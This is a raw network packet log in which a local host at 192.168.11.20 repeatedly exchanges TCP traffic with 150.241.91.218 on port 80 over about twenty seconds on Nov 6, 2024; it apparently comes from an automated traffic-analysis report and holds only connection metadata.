                                                                                                                                                              Nov 6, 2024 17:36:37.529668093 CET4991380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:37.530083895 CET4991480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:37.717909098 CET8049913150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:37.717952013 CET8049914150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:37.718156099 CET4991480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:37.718168974 CET4991380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:37.718291998 CET4991480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:37.718291998 CET4991480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:37.905919075 CET8049914150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:37.906033039 CET8049914150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:37.973872900 CET8049914150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:37.984436035 CET4991480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:37.984942913 CET4991580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:38.172069073 CET8049914150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:38.172405958 CET4991480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:38.172533035 CET8049915150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:38.172771931 CET4991580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:38.172858000 CET4991580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:38.172858000 CET4991580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:38.360990047 CET8049915150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:38.361002922 CET8049915150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:38.431313992 CET8049915150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:38.450846910 CET4991580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:38.451447010 CET4991680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:38.639712095 CET8049915150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:38.639727116 CET8049916150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:38.639954090 CET4991580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:38.639955044 CET4991680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:38.640124083 CET4991680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:38.640124083 CET4991680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:38.832379103 CET8049916150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:38.832389116 CET8049916150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:38.900367975 CET8049916150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:38.910831928 CET4991680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:38.911320925 CET4991780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:39.098784924 CET8049917150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:39.098839998 CET8049916150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:39.099046946 CET4991680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:39.099046946 CET4991780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:39.099261999 CET4991780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:39.099262953 CET4991780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:39.287147999 CET8049917150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:39.287156105 CET8049917150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:39.355454922 CET8049917150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:39.367008924 CET4991780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:39.367191076 CET4991880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:39.554821014 CET8049917150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:39.555021048 CET4991780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:39.555078030 CET8049918150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:39.555267096 CET4991880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:39.555411100 CET4991880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:39.555412054 CET4991880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:39.743593931 CET8049918150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:39.743649006 CET8049918150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:39.808996916 CET8049918150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:39.828625917 CET4991880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:39.829220057 CET4991980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:40.020879030 CET8049918150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:40.020952940 CET8049919150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:40.021109104 CET4991880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:40.021109104 CET4991980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:40.021409988 CET4991980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:40.021409988 CET4991980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:40.210444927 CET8049919150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:40.210454941 CET8049919150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:40.281641006 CET8049919150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:40.293209076 CET4991980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:40.293709040 CET4992080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:40.491194010 CET8049919150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:40.491203070 CET8049920150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:40.491384029 CET4991980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:40.491420031 CET4992080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:40.491556883 CET4992080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:40.491556883 CET4992080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:40.680114985 CET8049920150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:40.680131912 CET8049920150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:40.745392084 CET8049920150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:40.762276888 CET4992080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:40.762871027 CET4992180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:40.950145960 CET8049920150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:40.950450897 CET4992080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:40.950982094 CET8049921150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:40.951191902 CET4992180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:40.951323032 CET4992180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:40.951323032 CET4992180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:41.139750004 CET8049921150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:41.139756918 CET8049921150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:42.223737001 CET8049921150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:42.238533974 CET4992180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:42.239132881 CET4992280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:42.426451921 CET8049921150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:42.426582098 CET8049922150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:42.426588058 CET4992180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:42.426774025 CET4992280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:42.426933050 CET4992280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:42.426933050 CET4992280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:42.614442110 CET8049922150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:42.614546061 CET8049922150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:43.693698883 CET8049922150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:43.706032991 CET4992280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:43.706537962 CET4992380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:43.893752098 CET8049922150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:43.894032955 CET4992280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:43.894670963 CET8049923150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:43.894957066 CET4992380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:43.895212889 CET4992380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:43.895212889 CET4992380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:44.083479881 CET8049923150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:44.083492994 CET8049923150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:44.153393030 CET8049923150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:44.164434910 CET4992380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:44.164930105 CET4992480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:44.353272915 CET8049923150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:44.353283882 CET8049924150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:44.353506088 CET4992380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:44.353545904 CET4992480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:44.353667974 CET4992480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:44.353668928 CET4992480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:44.541681051 CET8049924150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:44.541691065 CET8049924150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:44.607985020 CET8049924150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:44.624654055 CET4992480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:44.625303030 CET4992580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:44.812515020 CET8049924150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:44.812738895 CET4992480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:44.813241959 CET8049925150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:44.813555956 CET4992580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:44.813646078 CET4992580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:44.813646078 CET4992580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:45.001827002 CET8049925150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:45.001838923 CET8049925150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:45.071505070 CET8049925150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:45.082745075 CET4992580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:45.083578110 CET4992680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:45.271280050 CET8049925150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:45.271295071 CET8049926150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:45.271557093 CET4992680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:45.271574020 CET4992580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:45.271667957 CET4992680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:45.271667957 CET4992680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:45.460016966 CET8049926150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:45.460028887 CET8049926150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:45.530832052 CET8049926150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:45.572177887 CET4992680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:45.713176012 CET4992680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:45.713824987 CET4992780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:45.900722027 CET8049926150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:45.900923014 CET4992680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:45.901500940 CET8049927150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:45.901638031 CET4992780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:45.901771069 CET4992780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:45.901771069 CET4992780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:46.089426041 CET8049927150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:46.089435101 CET8049927150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:46.158344984 CET8049927150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:46.169363976 CET4992780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:46.169898033 CET4992880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:46.357526064 CET8049927150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:46.357539892 CET8049928150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:46.357959032 CET4992780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:46.357964993 CET4992880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:46.358066082 CET4992880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:46.358066082 CET4992880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:46.545840025 CET8049928150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:46.545893908 CET8049928150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:46.613090992 CET8049928150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:46.625032902 CET4992880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:46.625475883 CET4992980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:46.813222885 CET8049928150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:46.813433886 CET4992880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:46.813997984 CET8049929150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:46.814161062 CET4992980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:46.814268112 CET4992980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:46.814268112 CET4992980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:47.003918886 CET8049929150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:47.003947973 CET8049929150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:47.072101116 CET8049929150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:47.083452940 CET4992980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:47.083931923 CET4993080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:47.271867037 CET8049929150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:47.272140026 CET4992980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:47.272761106 CET8049930150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:47.273063898 CET4993080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:47.273202896 CET4993080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:47.273202896 CET4993080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:47.462035894 CET8049930150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:47.462080956 CET8049930150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:47.528768063 CET8049930150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:47.542218924 CET4993080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:47.542753935 CET4993180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:47.730746031 CET8049930150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:47.730789900 CET8049931150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:47.731070995 CET4993180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:47.731070995 CET4993080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:47.731256962 CET4993180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:47.731256962 CET4993180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:47.919682026 CET8049931150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:47.919723988 CET8049931150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:47.986485958 CET8049931150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:47.999356031 CET4993180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:47.999824047 CET4993280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:48.186939001 CET8049931150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:48.187167883 CET4993180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:48.188708067 CET8049932150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:48.188888073 CET4993280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:48.189032078 CET4993280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:48.189032078 CET4993280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:48.377070904 CET8049932150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:48.377084017 CET8049932150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:48.444205046 CET8049932150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:48.455625057 CET4993280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:48.455936909 CET4993380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:48.644113064 CET8049933150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:48.644157887 CET8049932150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:48.644383907 CET4993280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:48.644383907 CET4993380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:48.644690037 CET4993380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:48.644690037 CET4993380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:48.832748890 CET8049933150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:48.832792044 CET8049933150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:49.904406071 CET8049933150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:49.915111065 CET4993380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:49.916771889 CET4993480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:50.103516102 CET8049933150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:50.103720903 CET4993380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:50.105003119 CET8049934150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:50.105201006 CET4993480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:50.105382919 CET4993480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:50.105382919 CET4993480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:50.295818090 CET8049934150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:50.295917034 CET8049934150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:50.671794891 CET8049934150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:50.686463118 CET4993480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:50.686944962 CET4993580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:50.878601074 CET8049934150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:50.878823042 CET4993480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:50.879271030 CET8049935150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:50.879543066 CET4993580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:50.879622936 CET4993580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:50.879623890 CET4993580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:51.069533110 CET8049935150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:51.069545031 CET8049935150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:51.139949083 CET8049935150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:51.152812958 CET4993580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:51.153377056 CET4993680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:51.343744040 CET8049935150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:51.343866110 CET8049936150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:51.343924999 CET4993580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:51.344062090 CET4993680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:51.344216108 CET4993680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:51.344216108 CET4993680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:51.534693956 CET8049936150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:51.534735918 CET8049936150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:51.609765053 CET8049936150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:51.620309114 CET4993680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:51.620752096 CET4993780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:51.811064005 CET8049937150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:51.811105013 CET8049936150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:51.811316013 CET4993780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:51.811379910 CET4993680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:51.811464071 CET4993780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:51.811465025 CET4993780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:51.999636889 CET8049937150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:51.999649048 CET8049937150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:52.066674948 CET8049937150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:52.077517986 CET4993780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:52.077884912 CET4993880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:52.265683889 CET8049938150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:52.265750885 CET8049937150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:52.265872955 CET4993880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:52.265925884 CET4993780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:52.266035080 CET4993880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:52.266036034 CET4993880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:52.462393999 CET8049938150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:52.462435007 CET8049938150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:52.533801079 CET8049938150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:52.547863960 CET4993880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:52.548553944 CET4993980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:52.735668898 CET8049938150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:52.735924959 CET4993880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:52.737237930 CET8049939150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:52.737432957 CET4993980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:52.737586975 CET4993980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:52.737586975 CET4993980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:52.933044910 CET8049939150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:52.933083057 CET8049939150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:53.002726078 CET8049939150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:53.016510010 CET4993980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:53.017170906 CET4994080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:53.205423117 CET8049939150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:53.205754995 CET4993980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:53.205833912 CET8049940150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:53.206203938 CET4994080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:53.206203938 CET4994080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:53.206203938 CET4994080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:53.394427061 CET8049940150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:53.394542933 CET8049940150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:54.482275009 CET8049940150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:36:54.523464918 CET4994080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:36:54.664288044 CET4994080192.168.11.20150.241.91.218
